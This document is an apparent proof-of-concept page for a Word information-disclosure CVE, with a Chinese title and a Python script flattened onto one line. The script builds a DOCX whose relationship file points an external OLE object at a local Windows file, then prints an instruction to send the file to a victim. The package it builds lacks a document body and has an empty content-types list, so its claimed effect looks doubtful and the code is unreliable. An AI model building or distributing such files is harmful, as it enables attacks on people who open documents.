CVE-2026-35440 Microsoft Office Word信息泄露漏洞

# Proof of Concept for CVE-2026-35440 # This script demonstrates the creation of a malicious DOCX file # containing an external reference to a local file to trigger the info disclosure. import zipfile import os def create_malicious_docx(filename): # Create a minimal DOCX structure # The vulnerability is triggered via relationships pointing to local resources rels_content = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"> <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="file:///c:/windows/win.ini" TargetMode="External"/> </Relationships>""" # Create a temporary directory structure base_dir = "temp_docx" rels_dir = os.path.join(base_dir, "_rels") os.makedirs(rels_dir, exist_ok=True) # Write the .rels file with open(os.path.join(rels_dir, ".rels"), "w") as f: f.write(rels_content) # Create [Content_Types].xml content_types = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"></Types>""" with open(os.path.join(base_dir, "[Content_Types].xml"), "w") as f: f.write(content_types) # Zip into docx with zipfile.ZipFile(filename, 'w', zipfile.ZIP_DEFLATED) as zf: for root, dirs, files in os.walk(base_dir): for file in files: abs_file = os.path.join(root, file) rel_file = os.path.relpath(abs_file, base_dir) zf.write(abs_file, rel_file) # Cleanup for root, dirs, files in os.walk(base_dir, topdown=False): for name in files: os.remove(os.path.join(root, name)) for name in dirs: os.rmdir(os.path.join(root, name)) os.rmdir(base_dir) print(f"[+] Created malicious file: {filename}") print(f"[+] Send this file to a victim and open it in Word.") if __name__ == "__main__": create_malicious_docx("cve_2026_35440_poc.docx")